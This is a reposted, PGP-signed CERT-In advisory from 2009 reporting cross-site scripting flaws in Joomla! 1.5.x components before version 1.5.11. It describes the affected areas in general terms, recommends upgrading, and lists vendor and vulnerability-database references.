Hash: SHA512
Cross-Site Scripting Vulnerabilities in Joomla!
http://www.cert-in.org.in/vulnerability/civn-2009-67.htm
Original Issue Date:June 09, 2009
Severity Rating: Medium
System Affected
* Joomla! 1.5.x prior to 1.5.11
Overview
Multiple cross site scripting vulnerabilities have been reported in Joomla
core components which could allow a remote attacker to perform cross site
scripting (XSS) attacks.
Description
Joomla is a free PHP based dynamic portal engine and content management
system (CMS) used to create websites. It supports additional functionality
through third part components and modules.
These vulnerabilities exist due to the Admin, Content and the Search
components for Joomla are not properly sanitizing some of the user-supplied
input.
These issues are caused by input validation errors in the in the user view
of com_users in the administrator panel, in the JA_Purity template, and
within the Frontend when displaying certain data, which could be exploited
by attackers to cause arbitrary scripting code to be executed by the user's
browser in the security context of an affected Web site.
An attacker could use this vulnerability to steal the victim's cookie-based
authentication credentials.
Solution
Upgrade to Joomla! 1.5.11 or later
http://www.joomla.org/download.html
Vendor Information
Joomla
http://www.joomla.org
References
Joomla
http://developer.joomla.org/security/news/297-20090602-core
- -frontend-xss.html
http://developer.joomla.org/security/news/296-20090602-core
- -japurity-xss.html
http://developer.joomla.org/security/news/295-20090601-core
- -comusers-xss.html
ISS X-FORCE
http://xforce.iss.net/xforce/xfdb/50924
http://xforce.iss.net/xforce/xfdb/50923
http://xforce.iss.net/xforce/xfdb/50922
Secunia
http://secunia.com/advisories/35278/
OSVDB
http://osvdb.org/osvdb/show/54869
Disclaimer
The information provided herein is on "as is" basis, without warranty of
any kind.
Contact Information
Phone: +91-11-24368572
Postal address
Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology
Electronics Niketan
6, C.G.O. Complex
New Delhi-110 003
Note: Please do not reply to this e-mail. For further queries contact
CERT-In Information Desk. Email: info@cert-in.org.in
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.0.5 (Build 5050)
iQEVAwUBSi+wLHWXeYNsoT30AQpPygf8CKWcUkl4ZNgdERIMV5kg4p2D0FnDFObi
mzj+IGGl/cg3NLZGLWs7iWO3bMhsMdDX8Tw3y/gLStylZNuTotWJeAm3TBI6Yrzq
+niEc2+W68emeaRRwHJGTQCSFH7NnaWTCjSKo1ib6Hkwh49bnuKZtY+0i8Six2j9
zH/amdZ2frhwuIGxFvurfx3Dw9d30zBcdK+HhLCantsVLrqwi50y3CUf1d6VoT5q
ZXOqMYGBSsSPVpOBtTW4+2DdGrB2s2K7L77UyZFfNr8RVeA6QbtOQgCd5Jm96VBH
mLXsMD8DhJHyc3N/CfV+eSp1ySYDOfLk+zB+0UBGHSH7MnODCVDKWQ==
=1HpT
-----END PGP SIGNATURE-----
No comments:
Post a Comment